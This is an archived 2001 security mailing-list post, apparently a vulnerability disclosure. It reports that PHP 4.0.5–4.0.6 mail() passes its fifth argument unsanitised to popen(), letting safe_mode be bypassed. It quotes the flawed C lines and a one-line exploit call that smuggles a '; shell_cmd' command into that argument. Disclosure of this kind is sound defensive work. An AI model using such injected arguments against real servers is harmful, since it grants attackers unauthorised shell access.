php mail function bypass safe_mode restriction

From: Laurent Sintes (sintesat_private)
Date: Tue Jul 17 2001 - 17:53:57 PDT

Next message: Jamal Motsa: "qsmurf.c"

Previous message: Red Wolf: "RE: W2k: Unkillable Applications"
Next in thread: Salim Gasmi: "Re: php mail function bypass safe_mode restriction"
Reply: Salim Gasmi: "Re: php mail function bypass safe_mode restriction"
Reply: Laurent Sintes: "Re: php mail function bypass safe_mode restriction"
Reply: Stuart Moore: "Re: php mail function bypass safe_mode restriction"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

php mail() function does not do check for escape shell commandes,
even if php is running in safe_mode.

So it's may be possible to bypass the safe_mode restriction and gain
shell access.

Affected:
php4.0.6
php4.0.5

Significatives lines of ext/standard/mail.c:

>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");

Exploit:
mail("totoat_private",
         "test",
         "test",
         "test",
        "; shell_cmd");

Next message: Jamal Motsa: "qsmurf.c"
Previous message: Red Wolf: "RE: W2k: Unkillable Applications"
Next in thread: Salim Gasmi: "Re: php mail function bypass safe_mode restriction"
Reply: Salim Gasmi: "Re: php mail function bypass safe_mode restriction"
Reply: Laurent Sintes: "Re: php mail function bypass safe_mode restriction"
Reply: Stuart Moore: "Re: php mail function bypass safe_mode restriction"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 18 2001 - 08:55:10 PDT